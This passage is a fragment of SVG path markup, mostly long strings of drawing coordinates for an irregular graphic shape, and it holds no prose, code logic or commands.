-1.6.7-1.1-.9,1.2-.9.2-1.8a19.5,19.5,0,0,0,5.1.6c-6.1-1-4.5-1.5-1.3-.8-1.3-1.2,3.1-1.5-.6-3.3,4.1.5,4.1-.2,1.5-1,1.4.2,2.3.4,3.2.6-1.4-.7.9-.4,2.8-.2-3-.9-3.6-.2-5.2-.8a7.88,7.88,0,0,1,3.8-.1c0-.8-3.4-3,.5-3-3.6-1.3-4.9-5.3,1.6-2.7.7-.7-1.2-1.9-1.1-2.4.6.7.6-.1,4.2.7-1.1-.5-1.5-.6.8-.4-4.9-.9,1.4-.5-2.6-1.4,0,.1-.8,0-1.1-.2,2.8.4,2.6.3,6.2.8,2.8.7.8.5,2.5,1.2,3.6.4,3.5.7,6.4,1.3-2.3-1.8-.8-1.4.9-2.3-3.9-.7-1,.4-3.9-.1l-.3-.6c-2-.3-3.5-.5-4.1-.5,3.9.6-.5.3,3.4,1-.8,0-.6.3-4-.3-.3-.3.8-.4-2.3-.8.9.4,1.8.8-.7.5-3.9-1.3.7-1.9-3.6-3.5a4.17,4.17,0,0,0,2.6-.4c2.1.1,4.2.1,6.1.3a9,9,0,0,1,2-.2,3.87,3.87,0,0,0,1.9.3,4.17,4.17,0,0,1-1.1-.3h2.3c-.5.3,1.4.4,1.5.7,6.9.4,16.6.6,21.8,1.2.4-.4-5.3-.5-2.6-.7,2.8.1,2.5.4,5.5.4.6.2.7.5,3.5.5-1.6-.3,2.5-.4-.3-.4h1.3c.2.1.5.1.7.2-.2-.1-.3-.1-.4-.2,1.8-.1,3-.2,5.5-.2.4.4,2.2.6,4.1.7a19.51,19.51,0,0,0,5.5-.3c4.4.2,5.8.5,10.1,1-4.4.3-6.2-.1-10.6-.2-2,.8,13.9.9,10.8.4,2.7.2,2.1.4,1.5.7,3.4,0,1.7.4,4.5.4-.5-.3,0-.4,1.8-.4,1.2.2,1.3.4,2.5.6,7.5,0,9.1.2,18.1.4a16.36,16.36,0,0,1,3.8-.6,42.76,42.76,0,0,0,6.5.2c0,.2.5.3,1.3.5,4.5.2,4-.1,7.3-.1.1.3,1.1.7-.5.9,2,0,2.4.2,4.3.2,1.2-.3-3.5-.7-.5-.8s4,.5,2.5.6c6.2.3,12.7,1.9,18.4.9.4.2,1.7.2,1.4.5,4.7-.1,5.6.1,8.3-.2.4.2,1.9.2,2.3.4,1.1.3-1.3.3-.7.5,7.8.7,22.3.4,14.2-.8a38.38,38.38,0,0,1,6.6.5c-.9.4-2.6.7-2.4,1.2-5.2.3-11.2.6-17.1.6h0a109.94,109.94,0,0,1-14.5-.9c-3.6-.5-.9-.8-7.1-1.1.7.5,2,.7-.4,1,8.7,0,2.4,1.4,6.5,1.9-1.1.1-4.3,0-4,.4.8.2,2.5.4,3.6.6-3,.4.2,1.1-.8,2.1a14.87,14.87,0,0,1-2.2-.2c2.9,1.2-2.9,2.2,4.3,3.4-.4.4-3.2.6-2.4,1.2-3.3-.1-5,0-7.3.1,13.3,1.8,42.6,1.7,42.7-.4,8-.9,11.9-2.1,10.1-3.7,3.1-.1,3.7.2,6.3,0-1.4-.8,1.1-1.2,5.4-1.4-3.2-.1.9-.2-.3-.4-1.6.1-3.9.3-8.2.4,0-1.2-7-1.7-3.8-2.6,9.3.5,12.6,1.4,24.2,1.7,3.1,0,2.5-.5,7.1-.4,0-.2-.5-.3-1.3-.5a38.13,38.13,0,0,0,4-.2c2.9-.3,2.3-.9.3-1.6a.42.42,0,0,1-.2-.1h.34c3.4,0,4.8.1,4.8-.2,3.4-.1,1,.4,4.4.3a8.21,8.21,0,0,1,2.1-.1c-.1-.2-.5-.3-1.4-.5,8.5-.2,8.5-2.7,21.2-1.2,0,.3,1.3.8-.4,1,6.4.3.9.9,5.1,1.4-.3-.8,2.5-1-2.1-1.6,6.7.3,7.9-.3,10.7.3.7-.5,1.7-.7,3.6-.9,1.1.3,2.6-.1,5.3.1-.8.5,2.4.7,4.8,1-4.2.1-5,.6-5.5,1.2a13.54,13.54,0,0,1,3.3.2c-2.2.2-3.7.5-2.5,1,5.3,0,7.9.4,11.7.2,2.8.9,10.5.4,15.4.9-2-.5,2-1-3.1-1.4,3.1-.2,6.4-.3,8-.6-8.6-.2-4-1.4,1.2-1.4-1.4-.4-3.3-.7-4.9-1.1,1.1,0,1.2-.1,2-.1,4.3.2,5.4.6,5.8.9-.3-.2.9-.2,3-.2-.7-.3-3-.8.6-.8,1.6.3.1.8,2.6.7-2.5-.6,3.7.2,6.2-.2,2.7.3.4.7.6,1,2.8.2,3.3,0,4.3.2-.5,1.1,2.1,1.9,1.7,2.5.7-.4,5.2.1,5.5.4-4.3,0,1.5.6-1.6.7-2.7-.3-1.9-.4-1.6-.8-3.3-.2-3.6,0-6.5-.2-1.4.4,4.6.1,4.5.4s.7.4-.8.4c-1.7,0-1-.3-3.3-.3.3.5-1.8.5-6.1.3-.2.3-.8.2-2.8.5,2,.1,2.3-.1,4.2,0,1.2.2,1.3.4,2.5.6-1.8-.3-6.3.2-2.8.5l3-.3c.5.6-4.6.6-1.4,1.1.2-.1,2.2-.1,3-.2-2,.2.1.7,2.6.8-.5-.3-2.6-.5.7-.5,2.6.6,12.9.1,7.1-.3,1,.9-9.5-.2-2,.2.7-.3-3.6-.2-3.5-.5,11.5,0,5.9.8,13.4,1.3-2.1-.3-3.3-.7-.6-.9,9.6.1,15.1-.6,15.7-1.3h.3c.8.3,4.2.3,6.6.5-.6-.5,2.1-.4,7.1-.4-2.2-.4-2.7-.5-.5-.8-1.5-.2-5.2-.2-5.5-.4.5-.3,1.5-.8,5-.4-1.6-.5.8-1-5-1.3a15.32,15.32,0,0,1-1.9.3c-.1-.1-.1-.2-.2-.3-7.8.5-16.3-1.3-8.3-1.5-.1.1.4.8,1.3.5q-1.2-.45,3-.3c-1.6.1.8.5,3.6.6-1.4-.5,1.3-.5,2.7-.6-5-.6-3.1-1.6-7.9-2.5a27.31,27.31,0,0,0,3-.2c.2.2.1.4,2.4.4.6-.6-3.6-.8-4-1.3,3.2,0,4.4-.3-.1-.2-1-.5-.2-.8,4.9-.6a24.64,24.64,0,0,0,3.7.8c.6-.3,3.2-.3,3.8-.6,1.8,0,.8.3,2.3.4,2.5-.3-.1-.4-2.3-.6a9.16,9.16,0,0,0-2.6-.4c-.1-.1-.2-.3-.3-.4,1.6,0,3.9.1,4.2,0-4.1-.1-5.7-.2-7.6-.4-.5-.3,3-.1,3-.3-1.3,0-1.3-.2-1.3-.4-2.5-.1-6.9-.6-6.3,0,2.5.2,3.8-.2,4.2.1.7.4-2.5.3-4,.4-2.9-.3.4-1-.9-1.3,0,.2-2.6.1-2.2-.2,3.2,0,3.3.3,6.4.2.6-.5-2.2-.7-2.8-1,1.4,0,1.4-.1,3.1,0,1.8.4-4.4-1.2-6.3-1.7h.4c2.4.3,1.8.5,3.3.8,2.1-.1,1.1-.4.1-.7,1.6.1,3.6.2,4.9.4,1.1.3-2.8.5.5.8-.4-.4,1.1-.6,3-.7.4.1.8.1,1.1.2,1.3.3,5.2.2,7.4.6-.8.2-7.4.7-4.8.7a8.21,8.21,0,0,1,2.1-.1c.1.1.1.1.1.2-.4,0-.7.1-.6.1h.5a3.36,3.36,0,0,1-.6.3c-.7-.1-1.5-.1-2.6-.2,1.7.7-4,.9.2,1.7h2.3a4,4,0,0,1,.5.1c0,.1.1.1.1.2-1.3.1-1.1-.1-3.7-.1-.7.3,1.8.3,3.9.3.9.7,2.7,1.3-1.4,1.6,4.5.4,2,1.2,7,1.6,0-.3.4-.6.4-.9.8-.1,1.5-.1,2.3-.2h-2.4c-.1-.2-.4-.3-1-.5a16.21,16.21,0,0,0,2.2-.2,8.1,8.1,0,0,0,2.2,0,2.08,2.08,0,0,1,.7.1c0-.2,2.5-.2,5.2-.1,1.2-.5.7-1.1,3-1.8-3.8-.1-1.8.5-6.1.3-.2-.1-.2-.1-.1-.1h.4a5.6,5.6,0,0,0,.7-.2,3.88,3.88,0,0,0,.9-.1h-.7a3.25,3.25,0,0,0-1.3-.3,23.14,23.14,0,0,1,3,.2c.3-.3,3-.8.3-1.1.1.3-1.7.3-2.8.5-7-1.2,7.3-1.1,12-1a11.71,11.71,0,0,1,3.8-.6c4.6.1,1.8.9,6.9.9,1.2-.2-4.4-.4-1.3-.5a12.28,12.28,0,0,0,2.9.2,4.76,4.76,0,0,0,.7.3h-.1c-.1.2.5.3,1.5.3.6.1,1.4.3,2.1.4-.4-.1-.5-.2-.4-.3,2.7.1,6.1.1,6.8.4-.6.1-1.9.5,1.4.6,2.9.1-1.4-.6,2.9-.4,1.8,0,.8.3,2.4.4.7-.3,2.8.2,5.3.1.2-.3-.8-.7,3.8-.7-5.8-.1-3.6-.4-7.5-.2a15.33,15.33,0,0,1,5.1-.2c-1.2-1.1,1.3-1.8-.8-2.7,3.2-.1,4.3-.4,8.1-.4,2.5,0,1.6.3,2.8.5-.4.1-.6.1-.9.2a3.7,3.7,0,0,1,1.1-.1h.5a12.27,12.27,0,0,1,2.1,0,2,2,0,0,1,.9-.2c1.5,0,3.3,0,5.4.2-3.6-.3-2.1-.4-1-.6-1.2.5,4.7.4,5.3,1a16.09,16.09,0,0,0-2.5.1,12.35,12.35,0,0,0-1.7-.3c1.2.5-5.7.7-1.9,1a24.26,24.26,0,0,0,3.3-.2,9.78,9.78,0,0,0,1.3.3c3.1-.3,0-.9,4.7-.9-.3.3-.1.8,3.8,1-.3-.6,3.4-.7,5.6-1,.9.2-5.2,1.5-.9,1.8,1.9-.7,6-.9,12-1,1.3-.3-3.3-.6-.4-.7-.4.5,5.4-.2,1.8-.4.3.3-5.3.1-5.4-.2a45.71,45.71,0,0,0,7.4,0c-.3-.8-1.3-1.4-4.4-1.9.7.3-1.5.4-.1.6.1,0,.1.1.2.1-4.1.2-7.2,0-9.8.4-1-.5-.1-.5-2.6-.8,2.3,0,3.6.4,3.1,0-5-.4-2.8-1,.2-1.3a31.61,31.61,0,0,1-5.2-1.7h1.3a3.54,3.54,0,0,1-1.2-.7,21.48,21.48,0,0,1,3.4-.2c-.1-.2-.7-.3-1.3-.4-1.2-.4-.4.1-2.2.1a.68.68,0,0,1,.5-.4c1.5-.1,2.7-.2,1.3-.3a.87.87,0,0,1-.5-.1,53,53,0,0,1,5.4-1.3c-6.7-.2-4.6.5-9.1.5-.2-.1-.5-.2-.7-.3,1.9-.1,1.8-.3,1.1-.7,4.8.1,5.9-.1,8.2-.1-9.7-.7-4.3-1.6-1.9-2.1a21.47,21.47,0,0,1,3,.3c1.3-.6.9-.9-2.2-1.2.2,0,.3-.1.5-.1,1,.1,2.4.1,3.8.1-1.3.1-2.6.5.9.6-.5-.3,4.1,0,2.9-.4-.3-.1-1.2-.1-2.1-.2a9.89,9.89,0,0,1,2.3.2c.1.6,3.1,1-.2,1.3-2.3-.1-1.1-.3-3.1-.4l.4.4c1.7.1,2.7.1,3.5.1-.4.2-2,.3-4.9.1.3.3,4.8.9,5.5.4-5.2-.3,1.6-.1,2-.2-1.8,0-1.1-.2-1.2-.3a20.13,20.13,0,0,1,2.2.1c-1.5-.4-1.8-.8-1.6-1.1a23.62,23.62,0,0,1,4.2.4c-.2.1-.3.3-.4.4a15,15,0,0,0-2.5.2h2.7c.1,0,.2.1.3.1-.2,0-.2-.1-.3-.1,2.5,0,2.8.2.5.2,5,.1.8.5,4.5.5,2-.5-3.3-.7-.7-1.1,4.8.7,2.1,1.4,10.7,1.9.3.4.2.6-.2.8h-.2a10.52,10.52,0,0,0-2.9,1.5c3.6.1,5.4,0,5.3-.3-3.3-.1-1.8-.4-1.1-.7.8.2.7.6,1.4.7,4.3.2,3-.3,7.3-.1-.6-.2-2.7-.6.4-.6.1.1.3.1.7.2,1.2.5-.8.9,1.6,1.4,1.4-.2,4.1.5,5.7.7a12.27,12.27,0,0,1,2.1,0c.3-.2,2.1-.3,2.8-.5,1.7.5,2.4-.1,5.2,0,1.8.1.1.5,3.5.5.9-.2,3.1-.8-.6-.9-.1.6-7.2-.1-9.7-.4,5.2-.2-.3-1.2,7.6-1.3-1.5-.1-3.3-.2-4.5-.4,1.5-.5,2.8-.8,8.2-.4-.4-.3,1.4-.3,2.9-.4,1.2.2,1.7.9-1.5.8.3.3,2.2.4.4.6,2,.2,4.4.4,6.7.6-1.8.5,2,.6.7,1,1.9,0,3.8.1,5.7.1.4.2-1.8.2-2.6.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5a11.33,11.33,0,0,1,2.6.3v.1c-.1,0-.2.1-.4.1h-1.7c1.8.5-2.8.2-1.8.5a26.2,26.2,0,0,0,2.8.1c1.9.1,2.1,0,2-.1.5,0,1-.1,1.3-.1a6.42,6.42,0,0,1-1.8-.2.3.3,0,0,0,.2-.1c.4,0,.9.1,1.5.1h.1c.7.1,2.3.1,2.7.2,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0c-3.2,0-1.9-.4-4.5-.4-.4.2-.1.5-3.9.3-1.3-.5-1.1-.9,0-1.2a50.79,50.79,0,0,1,7.8.2c-.5-.3.1-.5,2.9-.4.1-.2-1.4-.3-1.4-.5h4.2c.9.4,5.3.5,10,.9a7.88,7.88,0,0,1,2-.1c-3.2-.5,3.2-.4-1.6-.8a73.05,73.05,0,0,1,8.5.2c-1.3.1-1.1.4,1.4.5-.6-.4-1-.8-5-1.2a8.17,8.17,0,0,0,1.3-.2c1.6.1,3.4.1,4.9.2-.2.3,3,.2,2.5.6-.6,0-1.1.1.1.1,0-.1.1-.1,1-.1.3.1.2.2,1.2.2-1-.4,1.6-.3.6-.6-2,0-3.4-.1-4.6-.2,2.2,0,3.8,0,3.4-.2h-4.2c1.5-.2,1.2-.4-.6-.7,4.3.2,2.4-.6,6.2-.2.8-.4-4.8-.2-4.5-.5a7.35,7.35,0,0,0,2.4-.5h.5a8.34,8.34,0,0,1,1.8-.2c1.6,0,3.5,0,3.5-.2a21.47,21.47,0,0,1-3-.3c.4.2.3.3-.4.3a13.35,13.35,0,0,1-2,0h0c.1-.2,0-.5-.4-.7.8,0,1.7.1,2.5.1,5.8.2,10.1.4,8,1-7.2.1-3.4.6-1.7,1.3-1.9,0-3.1-.1-4.3-.2-.3.2-3.5,1.1,2.5,1.3,3.1.1-2.1-.3-.5-.6,4.6.2,1.6-.3,5.4-.2,2.3,1-.5,1.1-7.4,1,.5.7-1,1.1-2.1,1.8-.5.3-.9.6-1,1.1h.9c2.7.1,4.2-.2,4.8.1-2.2.3,1.1.5.9,1a12.82,12.82,0,0,0-4.1,0c5.1.5-4.5.4,3.4.7a34.87,34.87,0,0,1-5,.3h-1.7c.5,0,1.1.1,1.7.1,1.9.1,4.1.2,5.5.3.7.3.2.4-.9.5,2,.2,5.3.2,7.3.4-1.5-.5,2.6-.4,5.2-.4.6-.3-1.6-.4-2-.5.1,0,.2-.1.3-.1,1.8,0,3.6.1,5.4.1,1,.4-3,.4,1.9.6,5.1-.3-10.1-1-4.2-1.6-.6.6,3.8.2,6,.5-1.3-.7,12.9-1.8,13.5-.5,4.8.2,5-.1,5.3-.3-3.6,0-5.1-.2-4.6-.4-2.5-.1-8.2-.1-8.6-.3.9-.3,2.1-.6-2.2-.9,6-1.7.7-3.9,1.8-5.9,1.4.5,1.4.5.8.9,8.2.2,3.8.7,4.9.8,1.1-.3,1.7.4,4.3.1,1.6.9-.8,1.5,6.1,2.2-.5-.9,9.1.5,8.3,0-8.8-.6-7.4-1.3-3-1.8-1.7-.1-4-.1-4.4-.2,4.9-.2,5.3.5,7.7.8a45.25,45.25,0,0,0,4.6-1.1c2.2.1,4.6.3,4.6.5-1.1.4-2.8.2-.7.7-1.9,0-3.1-.1-4.3-.2-.1.3,3.5.4,3.4.7-2.4-.1-4.7-.1-7.1-.2a60.26,60.26,0,0,1,11.1,1.6c2-.7,13.6-1.2,8.1-1.9,2.4,0,8.4-.1,9.8.1-3,.4-4.4.3-.5,1-1.8,0-2.1-.2-4.4-.2.7.9-9.7.2-8.8,1.1,2.5.2,6.1.4,7.6.7.7-.3,6.6.1,7.2.3-2.7.1-3.5.3,1.6.3-3.1.4-.1,1.3-5.7,1.4-3.3-.1-4.3-.3-8.6-.3-4.3-.7-2.4-1.6-3.5-2.4-2.6,0-4.7,0-5.5.1,3.1,0,4.6.2,4.5.4-3.2,0-3.7,0-7.1-.2.5.3.8.5-2.3.5l-.4-.4c-7.1-.2-9.4.6-7.5.9a31.43,31.43,0,0,1,4-.2c.5.2,2.5.2,3.1.4-.8.4-4.8,0-6.8.2,4,.3-3.2,0-2.6.2,2.1.1,4.6.3,4.6.5-2.1,0-5.3-.2-5.6,0,11.8,1.3-6.6,1.6,4.1,3a30.21,30.21,0,0,0-5.2.4c5.3.1,7.7-.1,12.5,0-.7-.5-2.3-1.5,4.1-1.7.5.2,3.7.8-.6.9,2.1.1,5.2.1,5.8.2-2.2,1.1,5.1,2.9.6,3.8.2-.2,6.2.1,6.9-.1-5.9-.5-4.6-1.1.2-1.3-5.2-.8-3.5-2-5.2-2.7,7.9.1,8.8-.8,14.8-.5.6-.3-2.6-.9.5-1,.6.3,4.8.4,6.2.7,1-.2,2.9-.4,2-.8,3.6.1,4.6.3,5.6,0-1.1-.9-3.9-2,4.6-2.7,8.2.3,4,1,6.8,1.5,2.4-.4.1.5,3.2.5,0-.3,8.6-.1,9.9.2-1,.2-3.1.3-8.2.1.4.3.8.6,4.7.7-3.1-.7,7.4.1,6.8-.2-2.1-.1-3.6-.3-4.5-.4,8.3.2.3-.6-2.1-.8,4-.2-6.2-1.7,2.4-2,2,.4,3.5.7,2.2.9,5.9.2,9,.6,10.7,1.1-2.7.2-2.8-.1-5.8-.2.9.3,9.2.9,2.3,1a17.36,17.36,0,0,0-4.6-.5c4.6.7,13.6,1.5,14.3,2.1a52.3,52.3,0,0,0,5.6,0c3.1,1.1,11.6,2.3,3.7,2.6,1.2.4-.9,1,2.5,1.3.9-.4,7.8-.2,6.5-.5,2.2.4,5.5.8,9.3,1.1-4.1,0-.6.8-3.4.9-3.8,0,.5-.5-3.2-.5-8.7.9.3,3.1-7.5,4.1-4.3-.3,3.2-.9-3.8-1.2-3,.3-.9.9-4.3,1.4-5.2,0-6.4-.3-6.2-.7,8.4.2,2.8-1.4,13.3-.7-3.7-.6-4.9-1.3.1-1.5-.8-.2-5.6-.2-4.7-.5a33.79,33.79,0,0,1,4.5.3c-6.7-.7-2.8-2.7-10.1-3.6,2.6,0,4.7,0,5.5-.1-3.4-.1-4.1-.5-7.5-.6,1.9.4-2.7.3-3.8.5,2.1.1,5.3.7,2,.7s-1.9-.4-4.6-.4c-.3.1.2.2-1.2.2a4,4,0,0,0-1.6-.3c0,.5,9.4,1.3,2.7,1.5,1.1-.4-5-.3-6.1-.6,2.9-.4-2.6-1.4-4.2-1.6,2.1.7-7.4.4-9.1.8-2.4-.5,3.7-.1,2.4-.5a97.88,97.88,0,0,0-13.7.2c.7-.3-3.1-.3-4.5-.4-2,.2.6.9-6.6.4-.2.3,2.3.9-2.1.8-3.1-.3-.3-.9-6.5-1,18.3,2.3-19.2,2.2-5.9,4.3-6.7-.3-6.1.1-8.1.3-5.3-.3-9.4-.7-13.5-1.1,2.5-.2-.1-.3-.5-.6,2.2-.3,5.6.2,5.4-.2a52.3,52.3,0,0,0-5.6,0c-1.2-.5.7-.6,1.6-1.4-5-.3-5.1-.6-10.2-.6,2.6.8-2.7,1,4.4,1.8-3.1-.3-14.6,0-6.6.4.1-.2-.9-.4,1-.4,2.1.1,5.2.1,5.8.2-1,.4,5,.9-2.1.7,1.7-.1,1.5-.4-1.8-.5.2.4-2.6-.1-4,.2,4,.4,5.1,1.3,1.3,1.4-1.4,0-2.8-.1-4.3-.1,2.5-.4-10-1-3.3-.6-3.1.7,9.5,1.4,13.9,1.6.9.3-5.2,0-5.4.2,6.5.2,7,.7,10.7,1.1-.8-.2,4.9-.3,5.6,0-2.3.6,1.7,2-3.4,2.4-2.6-.2-4.7-.5-5.7-.1,9.8.3-1.9.9,2.5,1.3,4.9.2,1.4-.4,6.8-.2-.9.5,6.7.5,7.8.9-4.8.3-2.5,1.8.6,2.3,4.7-.1-2.1-.7,3.6-.7,3,.3,8.9.3,11.6.6-1.6.2,1.3.8,3.7,1.1a11.3,11.3,0,0,1,5.6,0c2-.9-3.5-1.5-2.2-2.4a55.5,55.5,0,0,1-5.9-.4c2.4,0-.6-.5,2.4-.5,5,.1,2.3.7,7.7.8.8-.3-5.6-1.4,1.8-1.2-.2-.2-.3-.4-.5-.6-9.9-.2-5.9-1.5,2-.9.9-.5-2.2-1.4,5.9-1.2-2.6.6-1.5,1.2,3,1.8.4-.2,3.9-.1,2.3-.5a19.43,19.43,0,0,1-4.5-.4c3.3,0,.9-.5,3.8-.5a66.19,66.19,0,0,0,6.9-.1c4.6.6-.7,1.1-1.5,1.5,5.6.2.7-.6,5.1-.5,2.3.1,1.1.3,3.1.4,3.1,0-1.4-.8,2-.8,2,.3,1.6.8,6.4.9a56.21,56.21,0,0,1-6.2.8c5-.1,6.4.7,14.8,1-5.7-.7-13-1.6-3-1.8-2.2-.6-3.4-1.5,1.3-1.7a68.57,68.57,0,0,0,7.7.8c5.8-.1-4.8-1-1.1-1.2.3.1.6.3,3,.3.1-.3-3-.4-4.7-.7a50.7,50.7,0,0,1,9.7,0c-4.4,1.2,1.3,2.6-6.4,3.8-3.3-.9,6.9-1.6-3.4-2.3,4.2.6-3.8.6,2.3,1-2,.4-8.3.3-4.8.9-1.6-.4,3.6,0,4.2.1a5.61,5.61,0,0,0-2.1.7c7.5.2,4.3,1.1,12.3,1.4-9-1.3.3-2.2,5.8-2.9-2.4-.4-5.6.1-7.2-.3a31.43,31.43,0,0,1,4-.2c7.3.5,5.3.1,12.4,0,2.9.7-6.4.2-6.4.6,1,.3,7.4.9,5.1,1a26.88,26.88,0,0,1-3.1-.3,17.67,17.67,0,0,0-2.4.4c3.2,0,5.4.1,5.9.4-7-.1-11.7,0-12,.6a41.15,41.15,0,0,1,4.3.1c-2.9.3-2.3.9-5.9,1.2,4.8.3.3.5,3.6,1-6.5-.2,1.2,1-4.8.9,1.1,0,1.7.1,1.6.3,14,.5,3.4-1.4,11.2-1.5-.4.6,3.3.5,4.4.2,7.8,1-10,1.5-1.2,1.8-.2.3-7.2.8-3.5.8,1.9-.5,1.1-.1,7,0,2.9,0-3.7-.8.6-.9,2,.1,1.6.8,3.2.5-1.4-.5-.2-.5-3.5-.8,1.5-.1,5.2-.1,6.8-.2-1.2-.2-6.9-.1-6-.5,15.1.2,5.5-1.5,12.2-1.9,5.5,1.7,2,3,3.6,4.1a9.07,9.07,0,0,1,2.8.1l.3.3c-3.3-.1-5.4-.1-7,0,3.6.5-2.9.4-3.5.8,4,.9,2.2,3-1,3.6-.2.5,3.4,2.5-5.9,2.8,2.1.1,5.2.1,5.8.2a31.08,31.08,0,0,0-5.1,2.1c1.9.1,5.4,0,5.8.2-1.2.2-5.1.1-6.7.3,9.3.8-4.7,1.1,1.8,2,6.9,0,1.8-.4-.4-.4a3.93,3.93,0,0,1,2.3-.5c.2.5,2.2,0,4.3.1,1.8.2,1.9.3.4.4,11.2.3.2-1.1,0-1.6s10.4,0,9.1-.7a35.62,35.62,0,0,0-4,.1c-2.2-.5-5.6-1.2.1-1.4,1.2.4,6,.2,5.5-.1-3.5-.3-1.7-.4-5-.9,6.9.5.7-.6,8.3,0-.5-.6-4.2-.3-6.2-.7,5.6-.2-1.1,0-1.8-.5,2.8,0,2.5-.3,5.6,0,.6-.6-4-1.1-1.3-1.4-2-.2-4.4-.3-6-.5,1.5-.4,2.9-.8,1.5-1.5,10.8.3,8.9-1.4,16.6-1.7-1.7-.1-4-.1-4.4-.2.2-.3,8.2,0,3.8-.5-4.9-.2-1.4.4-6.8.2-1.9-.6-6.4-1.7-3.4-2.3-1.4.3,5.5.7,6.1.6-2.4-.3-6-.6-6.5-1,1.9.2,5.3.2,7.3.4,1.4-.6-2.8-1.3-1.5-1.7,1.6.1,2.3.2,3,.3,2,.8-3.9,1.9,3.6,2.5-2.8-.8,3.8-1.7-1.1-2.8,7.9.2-4.54-1.69,4.66-1.79-7-1.1-4-2.51.24-3.41V0Z\"></path>\n        <path d=\"M1739.6,46.7c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A94.06,94.06,0,0,1,1739.6,46.7Z\"></path>\n        <path d=\"M1838.7,75.8c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C1836.6,75.8,1837.7,75.8,1838.7,75.8Z\"></path>\n        <path d=\"M1862.2,72.5c-2.3.1-8.6.3-5,.7C1856,72.7,1864.7,73.1,1862.2,72.5Z\"></path>\n        <path d=\"M1718.3,65.2c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4H1718c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.1.4.3,1.1-5,1.1h-2.4c1.2,0,2,.1,2.4.1.7.1.5.1,0,.1-1,.1-3.4.2-3.4.3,1.6.1,2.7.1,3.4.2,3,.3-.8.9,2.3,1.4h-2.3c-1.8,0-1.2.2,0,.4l1.6.3a7.82,7.82,0,0,1-1.6-.1c-4.9-.1-3,.4-6.4.4a35.32,35.32,0,0,1,6.4.7c1.3.3,1,.5,0,.8-1.7.4-5.2.7-6.7.9,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8a32.58,32.58,0,0,1,4.3.4c.2,0,.4.1.4.2s-.2.1-.4.1a23.8,23.8,0,0,1-4.3.3c1.2.1-1.7.7,1.3.5,1.1-.1,2.1-.2,3-.2,4.4,0,4.4,1.6-.1,2.1a29.32,29.32,0,0,1-5.3.1c.8.2,3.7.4,5.3.5a3.78,3.78,0,0,1,1,.2,3.07,3.07,0,0,0-1,.1,44.23,44.23,0,0,1-6.9.5c.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0h0c1.7.3,4.7.7.6.8-.2,0-.4-.1-.7-.1a22.83,22.83,0,0,0-6.6-.3c3.7.3.7,1.2-.3,1.2,1.5.3,4.4.1,6.9.2h.2c.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-1-.1-1.8-.2-2.6-.3-1.1-.2-2.1-.3-3.7-.5,3.1.5-2.2.5.9,1,1.1.1,2,.1,2.8.1a10.84,10.84,0,0,1,2.9.1c-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C1711,66,1709.7,65.1,1718.3,65.2Z\"></path>\n        <path d=\"M1860.5,67.3c4.2,0,1.8-.7,4.8-.9,8.1.5,10.1,1.7,1.6,1.8-1.4-.3,1.7-.2.9-.5-4.9,0-5.7,1.1,1.2,1.3-.8-.8,6.3-.8,10.1-1.2-1.7-.1-4-.1-4.4-.2,7.2.2.4-.4,5.2-.4-2,.2,5.1.4,4.3.2-3.4-.1-3.5-.4-6-.6,1.2.3-2.7.1-4,.2.2-.2-2.1-.3-3.1-.4,5.3-.1,7.5,0,9.4-.3-4.6-.2-4.2.1-7.1-.2,1.9.5-4.6.2-5.2.4l-.3-.3c-1.9,0-3.8-.1-5.7-.1C1864.6,66.8,1858.1,67.1,1860.5,67.3Z\"></path>\n        <path d=\"M1873,68.9c2.9-.1,4.8-.3,6.5-.5C1873.4,68.2,1871.4,68.8,1873,68.9Z\"></path>\n        <path d=\"M1728.4,62.5c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C1737.4,64.2,1726.8,63,1728.4,62.5Z\"></path>\n        <path d=\"M1744.4,63.3c-1.8,0-7.3,1.1-1.9,1C1739.6,64.1,1745.3,63.7,1744.4,63.3Z\"></path>\n        <path d=\"M1778.9,63c.4.5-8.9,2.1,1.6,1.8C1782.1,64.2,1783.4,63.8,1778.9,63Z\"></path>\n        <path d=\"M1774.7,62.9c-.4-.4-5.4-.5-7.7-.8C1762.9,61.6,1769.6,62.9,1774.7,62.9Z\"></path>\n        <path d=\"M1855.3,63.1c8,.1.4-1.1-2.6-1.4-.6.2-6.7.7-3.7.6,2.4,0,2-.4,5.3-.3C1852.1,62.4,1857.9,62.7,1855.3,63.1Z\"></path>\n        <path 